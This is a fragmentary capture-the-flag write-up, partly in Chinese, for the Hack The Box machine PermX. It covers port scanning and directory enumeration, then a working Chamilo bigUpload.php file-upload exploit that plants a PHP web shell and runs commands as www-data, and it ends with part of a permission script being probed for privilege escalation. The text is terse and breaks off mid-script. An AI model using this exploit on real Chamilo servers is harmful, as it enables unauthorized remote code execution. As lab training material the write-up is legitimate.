start infoscan 10.10.11.23:22 open 10.10.11.23:80 open [*] alive ports len is: 2 start vulscan [*] WebTitle http://10.10.11.23 code:302 len:277 title:302 Found 跳转url: http://permx.htb
添加下hosts文件。
目录扫描
1
gobuster dir -u http://permx.htb/ -w /usr/share/wordlists/dirb/common.txt
$ echo'<?php system("id"); ?>' > rce.php $ curl -F 'bigUploadFile=@rce.php''http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' The file has successfully been uploaded. $ curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php' uid=33(www-data) gid=33(www-data) groups=33(www-data)
1 2
curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' The file has successfully been uploaded.
if [ "$#" -ne 3 ]; then /usr/bin/echo "Usage: $0 user perm file" exit 1 fi
user="$1" perm="$2" target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then /usr/bin/echo "Access denied." exit 1 fi # Check if the path is a file if [ ! -f "$target" ]; then /usr/bin/echo "Target must be a file." exit 1 fi